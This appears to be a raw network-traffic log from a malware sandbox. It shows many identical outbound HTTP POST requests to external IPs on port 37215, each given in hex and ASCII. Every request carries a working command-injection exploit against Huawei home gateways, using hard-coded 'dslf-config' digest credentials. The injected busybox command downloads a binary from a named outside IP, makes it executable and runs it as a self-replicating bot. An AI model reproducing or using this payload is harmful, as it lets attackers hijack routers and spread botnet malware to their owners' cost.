                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          16192.168.2.233888841.105.159.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102368116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          17192.168.2.234984225.220.131.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102372885 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18192.168.2.235088641.69.170.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102375984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19192.168.2.235531841.179.57.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102375984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20192.168.2.2338692165.13.117.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102380037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21192.168.2.2340494178.64.112.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102381945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22192.168.2.2348418157.170.92.18137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102730036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23192.168.2.2333054109.169.161.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102730036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24192.168.2.2356050207.124.200.23737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102739096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25192.168.2.2345132157.4.171.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102735996 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          26192.168.2.233699041.60.71.21437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102761984 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
